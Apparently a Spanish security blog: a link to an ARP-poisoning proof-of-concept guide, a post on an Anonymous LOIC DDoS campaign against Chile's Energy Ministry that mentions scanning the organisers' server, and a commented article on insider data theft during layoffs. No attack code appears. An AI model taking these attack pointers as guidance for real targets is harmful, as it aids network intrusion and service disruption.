Para realizar pruebas de concepto básica de envenenamiento ARP, puede seguir este link http://es.scribd.com/doc/23287370/Arp-Poisoning-Ataque-Man-in-the-Middle

RE: DDoS Hidroaysen - Anonymous ???

Le toco al gobierno…

Después de atacar los sitios de HidroAysén y Endesa, Anonymous está organizando un ataque para mañana contra el Ministerio de Energía, pasando a la “segunda etapa” de la operación “#tormenta_del_sur“.

Como viene siendo tradicional, se tratará de un ataque distribuido de denegación de servicio (DDoS) usando LOIC. El ataque está convocado para mañana 17 de mayo a partir de las 9.30 am.

Anonymous ha indicado que “nuestro objetivo no es hacer daño, nuestro objetivo es hacernos notar, demostrar que la mayoría de los ciudadanos chilenos rechazamos este proyecto que solo busca generar ganancias para un grupo económico a costa de un daño medioambiental irreparable que no tiene justificación”.

El ataque se está organizando por medio de la siguiente página http://tormentadel-sur.tk/ y como siempre el canal IRC, al cual se pueden conectar mediante el mismo website.

Como dato curioso les dejo la georeferenciación IP del servidor que está alojando el web, será Telmex ¿? :-) :


También un poquito de nmap:


Otro poquito de Security focus, y quizás quizás:
http://www.securityfocus.com/archive/1/500823/30/0/threaded


hahahahah y les suena mail.emaildirect.cl, SPAMERS ¿?... mmmmm deja que pensar hahahaha… bueno estaremos atentos a lo que pasa mañana con el gobierno… veamos qué medidas se tomarán y que tanto revuelo cause este ataque

Despido de Empleados - INSEGURIDAD ¿?

Mis comentarios en Negrita

Haciendo alusión a los conocimientos técnicos de seguridad que podemos tener, me pareció importante compartir con ustedes este artículo que habla acerca del despido a un empleado… Pero que pasaría si fuera un CSO o un Pentester interno, o un desarrollador del core business, gente de soporte con conocimiento de las credenciales de administración del dominio, más que un simple usuarios con acceso al file server o a carpetas compartidas de negocio, o con acceso limitado al ERP ¿?

Los expertos en Seguridad aconsejan que las empresas tengan un plan de protección de la información comercial reservada y de los empleados, antes de poner en marcha la reducción del personal.


Mientras la recesión económica continúa castigando al mercado, cada vez más empresas enfrentan la difícil decisión de reducir drásticamente sus puestos de trabajo para poder mantenerse a flote. Y como la crisis comenzó en diciembre de 2007, en EEUU ya se han perdido más de 4 millones de empleos, según afirma la Agencia Nacional de Estadísticas Laborales.

Aunque la mayor parte de quienes toman las decisiones se concentran en capear el temporal económico, los expertos en seguridad advierten que deben mirar con recelo a sus empleados, que por temor a ser despedidos, podrían actuar en perjuicio de la seguridad física o logística de la empresa.

Recientemente, el Ponemon Institute -dedicado a investigaciones sobre el manejo de la información- y Symantec- empresa que desarrolla software de seguridad- llevaron a cabo una investigación en forma conjunta. Casi el 60% de los entrevistados-que habían perdido su trabajo hacía poco tiempo- admitieron que se habían llevado consigo información corporativa de carácter confidencial. De las 950 personas entrevistadas, el 53% contó que había copiado de la computadora a un CD o DVD información que contenía desde listas de contacto de clientes a legajos de empleados; mientras que el 42 % transfirió la información directamente a una memoria USB.

Brian Baker, consultor de seguridad privada con casi 20 años de experiencia, recomienda que además de restringir los medios que usan los empleados para robar o adulterar la información reservada, también se les debe impedir el acceso a archivos confidenciales. PFFFF Quizás lo dijo hace 10 años atrás… o no ¿? :-)

“La experiencia me ha enseñado que no existen los secretos en una empresa; y una vez que empieza a circular el rumor de posibles despidos, se dejan de acatar las normas sociales y las políticas corporativas. Y cuando todos hablan sobre eventuales conflictos, se deben modificar las contraseñas y los niveles de acceso, aunque esto implique trabajo adicional y mayores costos temporales.”
Baker agrega que la empresa también podría tercerizar la evaluación de vulnerabilidad de su TI (OJO, esto es algo que hace tiempo me está dando vueltas en mi cabeza, y no hablo de un pentesting a servidores o estaciones de trabajo o aplicaciones web, etc, si no hablo de un pentesting orientado al usuario final, INGENIERÍA SOCIAL [SET] para ver el grado de madures con lo cual manejan los sistema y la información los usuarios finales y ejecutivos [WHALING]).

“Es importante contratar a un consultor de seguridad de TI para que haga una evaluación y ayude a mejorar la seguridad; y por supuesto, se deben hacer copias de seguridad de todos los archivos”, advirtió Baker. “ Conozco un caso de una universidad con mucha rotación de personal, donde era un secreto a voces que los archivos de los profesores sólo se resguardaban por 32 horas, hasta que se reescribían nuevos datos en sus reducidas memorias. No tenían ningún tipo de seguridad o alarma de advertencia que detectara el robo de información por parte de algún empleado descontento. Fue así que se bajaron archivos académicos confidenciales, que fueron reemplazados por archivos jpeg. sin levantar sospechas, ya que se conservaba el tamaño de los originales.”. Un poco de análisis forenses sería suficiente no ¿?


Protección de la Información Confidencial

Un peligro latente que deben enfrentar las empresas y, en especial, el personal de seguridad son los delitos informáticos contra la información confidencial. Muchas veces, hay empleados con gran conocimiento de la computación, que pueden desbaratar una operación de algún colega, simplemente bajando un archivo infectado con virus o un programa de espionaje. (Es de mi idea loca… como mido riesgo, como gobierno el tema social¿?, cuales son los perfiles de mis usuarios avanzados y como puedo resguardar a los usuarios básicos [EJECUTIVOS])

“Supongamos que a usted le preocupan los virus: sin duda, usted debería tener su programa antivirus actualizado; y no sólo para los empleados que estén trabajando en su oficina, sino también para los empleados en tránsito, que tienen computadoras portátiles; o tal vez, para algunos ejecutivos que trabajan desde sus hogares,” explica Jim Kelton, encargado principal de la empresa de auditorías de seguridad de TI, Altius Information Technologies.

“También debe asegurarse de tener instalado un programa de protección contra la piratería: en el caso de una computadora portátil, probablemente será una protección de los programas informáticos (software); y si se trata de una organización con servidores, habrá que proteger los equipos de computación (hardware) contra posibles peligros.

” Kelton agrega que se deben revisar periódicamente las listas, para quitar de la red empresarial los nombres de usuario y la contraseña de los ex empleados; y confiscar los manuales o algún otro material que instruya cómo acceder a los sistemas. (No debería ser trabajo de RRHH, con algún perfiles especial y auditable¿?, nuevamente el error humano y no del procedimiento)

Felix Nater, dueño y presidente de la consultora de seguridad Nater Associates, afirma que las empresas deben proteger de manera pro-activa (QUE ES SEGURIDAD PROACTIVA, alguien se a echo esta pregunta¿?) la información confidencial. Esto se logra poniendo en marcha un plan que reduzca los riesgos de que algún empleado descontento produzca daños irreparables. Aun algo tan banal como un IPod puede significar un gran riesgo en las manos de una persona con los conocimientos adecuados.

“No permitan que los empleados traigan memorias portátiles USB (flash drives) a su lugar de trabajo, pues pueden copiar gran cantidad de información de los sistemas de la pequeña, mediana o gran empresa. Tampoco deberían permitirse los IPods con gran capacidad de almacenaje. Mientras que la mayoría de los empleados jamás recurriría a este tipo de ardid, cuando hay peligro inminente de perder el puesto de trabajo…..muchos sucumben a la tentación. ¿Cómo puedo incrementar mi atractivo para el mercado?” (Y QUE PASA CON LA GENTE DE TI¿?, CUALES SON LOS CONTROLES SI TIENEN MAYOR CONOCIMIENTO Y PROVILEGIOS¿?)

Kelton sostiene que cuanta más operatividad hayan volcado las empresas al área de TI, más vulnerables se han vuelto a este tipo de peligro. Y agrega que el mejor modo de protección de la información de TI es hacer una evaluación de vulnerabilidad de la seguridad (NUEVAMENTE LOS SISTEMAS… Y LAS PERSONAS ¿?, COMO REACCIONAN A LAS TÉCNICAS DE INGENIERÍA SOCIAL¿?).

Otro ítem a tener en cuenta es el conocimiento (o desconocimiento) que tienen las empresas acerca de las leyes federales y nacionales de protección de la información confidencial. “Hoy día, a todos nos preocupa la protección y seguridad de la información delicada; y se han sancionado varias leyes, pero muchas organizaciones no están enterradas. “El estado de California tiene 78 leyes de privacidad; pero muchas organizaciones ni siquiera saben que las están violando. Así que primero, dé un paso atrás e infórmese sobre lo que dicta el gobierno respecto de una industria específica…y sólo entonces, póngase a planificar la protección adecuada de su información confidencial.”

Espero las críticas de este articulo les sirvan para reflexionar sobre el despido de empleados en sus organizaciones y tener a la vista el despido de personal de TI, y espero que esto último lo tomen con mucha ética.

Welcome

Con la tecnología de Blogger.